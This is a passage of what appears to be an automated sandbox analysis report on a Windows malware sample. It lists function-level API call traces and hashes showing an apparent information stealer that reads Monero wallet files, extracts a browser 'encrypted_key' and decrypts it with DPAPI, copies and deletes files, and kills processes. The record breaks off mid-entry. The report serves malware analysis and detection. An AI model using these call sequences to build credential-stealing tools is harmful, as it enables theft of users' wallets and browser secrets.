                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                            • wsprintfW.USER32 ref: 00698D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                            • Instruction ID: f77331d54b21838d2b694f741d87e0fbb8019874457826e66a74c1c162caddb9
                            • Opcode Fuzzy Hash: 25c1c4e21020e33dd805383794ce6d8aa0c218502e09a52e60d12c8d8d726620
                            • Instruction Fuzzy Hash: 2FE08CB0A4020CBBDB04DB94DC0AE6977B8FB0470AF0000A4FD0987280DA719E008B96
                            Function 0068A260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068A2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 0068A3FF
                            • lstrlen.KERNEL32(00000000), ref: 0068A6BC
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 0068A743
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                            • Instruction ID: 99e52da9a13297e65049025ac139a5642b0256025dab14e38f67b2e43a574610
                            • Opcode Fuzzy Hash: 2ba761cf2c581dde315803725c5a1a2ab56b3058f348e65c1848b434a7c78d3c
                            • Instruction Fuzzy Hash: E8E1DC728201189ADF48FBE4DD92EEE737EBF14300F50815DF51676491EE306A49CBAA
                            Function 0068D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D481
                            • lstrlen.KERNEL32(00000000), ref: 0068D698
                            • lstrlen.KERNEL32(00000000), ref: 0068D6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 0068D72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                            • Instruction ID: 5a3d46461ca49818272ea98771e230742dd12d1102323d2031f524f3e6c13d45
                            • Opcode Fuzzy Hash: 1861bc2253614d0e7c66c4848bf804a1f7887f5262f52c2b2917aef3becf227d
                            • Instruction Fuzzy Hash: 8191FE718201189BDF48FBE4DD96DEE73BEBF14300F50416DF50666491EE346A09CBAA
                            Function 0068D780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D801
                            • lstrlen.KERNEL32(00000000), ref: 0068D99F
                            • lstrlen.KERNEL32(00000000), ref: 0068D9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 0068DA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                            • Instruction ID: ea3d857fbf0bec98a202f9d59b54e6732cb1ebe7a81ed805ebd2eed1e91c5a05
                            • Opcode Fuzzy Hash: 7851ca754e81c1f41fe5f4d4961f52ddea99e27b71cb286ca7ab8bfbe912d1ed
                            • Instruction Fuzzy Hash: 6881FF719201189BDF48FBE4DD96DEE73BEBF14300F50412DF406A6491EE346A09CBAA
                            Function 00693560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 9ac3404a806a09c679de59e709741886fdd85ecd90cb493380494de2aea051c7
                            • Instruction ID: e53e50d83d64f9b6193be55d349c9cf5e19c04c30db73a7d554c8eed8ce13727
                            • Opcode Fuzzy Hash: 9ac3404a806a09c679de59e709741886fdd85ecd90cb493380494de2aea051c7
                            • Instruction Fuzzy Hash: C3414E75D10109AFDF04EFE4D885AFEB7BAAB44304F008018E51677790EB35AA06CFA5
                            Function 00689CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                              • Part of subcall function 00689B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00689B84
                              • Part of subcall function 00689B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00689BA3
                              • Part of subcall function 00689B60: LocalFree.KERNEL32(?), ref: 00689BD3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                            • String ID: $"encrypted_key":"$DPAPI
                            • API String ID: 2100535398-738592651
                            • Opcode ID: 82ca6c9e7f5479e55980ae99a3a653afe0f2448a51387a8e54de6ab6b04b9af5
                            • Instruction ID: 08692f5424a242ed3bcd47ad1b5a83d4947d9ebfc7bdc3193cdc7ede7e15d02d
                            • Opcode Fuzzy Hash: 82ca6c9e7f5479e55980ae99a3a653afe0f2448a51387a8e54de6ab6b04b9af5
                            • Instruction Fuzzy Hash: 263130B5D10209EBCF04EBE4DC85AFEB7BABF48304F184619E905A7241E7349A04CBA5
                            Function 006994D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                            Download Yara Rule
                            APIs
                            • memset.MSVCRT ref: 006994EB
                              • Part of subcall function 00698D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0069951E,00000000), ref: 00698D5B
                              • Part of subcall function 00698D50: RtlAllocateHeap.NTDLL(00000000), ref: 00698D62
                              • Part of subcall function 00698D50: wsprintfW.USER32 ref: 00698D78
                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 006995AB
                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006995C9
                            • CloseHandle.KERNEL32(00000000), ref: 006995D6
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                            • String ID:
                            • API String ID: 3729781310-0
                            • Opcode ID: 4d813b720aaedc113e39d39edc1a5f0e18393bf6f1fdf2aec17ac28245b6401e
                            • Instruction ID: cf8b766307c6f707db040edcb6cf93071fa1ca702123c8f2c5080db16802d5fa
                            • Opcode Fuzzy Hash: 4d813b720aaedc113e39d39edc1a5f0e18393bf6f1fdf2aec17ac28245b6401e
                            • Instruction Fuzzy Hash: D8313A71A0020CAFDF14DBE4CD49FEEB7B9FB44304F104459E506AB684DB74AA89CB52
                            Function 00698680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,006A05B7), ref: 006986CA
                            • Process32First.KERNEL32(?,00000128), ref: 006986DE
                            • Process32Next.KERNEL32(?,00000128), ref: 006986F3
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • CloseHandle.KERNEL32(?), ref: 00698761
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                            • String ID:
                            • API String ID: 1066202413-0
                            • Opcode ID: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                            • Instruction ID: e16eb9b00ec5023134a0cbe78390f292412913d536e88332ebdf1e242b9f734d
                            • Opcode Fuzzy Hash: 4269d43d438b8684271fd5c21f611e041f43697f90581c8ae5a4ec9800f28da9
                            • Instruction Fuzzy Hash: 73315971911218ABCF64EB90DD45FEEB7BEFB45700F1041A9A10AA65A0DB306E45CFA1
                            Function 00697980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006A0E00,00000000,?), ref: 006979B0
                            • RtlAllocateHeap.NTDLL(00000000), ref: 006979B7
                            • GetLocalTime.KERNEL32(?,?,?,?,?,006A0E00,00000000,?), ref: 006979C4
                            • wsprintfA.USER32 ref: 006979F3
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                            • String ID:
                            • API String ID: 377395780-0
                            • Opcode ID: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                            • Instruction ID: f5f4d492f384167bc8019fa18423e5f6f358f72cfcd2c2f57ecb21130b22cf91
                            • Opcode Fuzzy Hash: 32536ed79c3c229196f0cbae2d9e2bdb67ef75c6bf7b38ec296988a0b989fec4
                            • Instruction Fuzzy Hash: 701127B2904118ABCB18DFC9DD45FBEB7F8FB4CB15F10421AF605A2280E2395940CBB1
                            Function 0069C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0069C74E
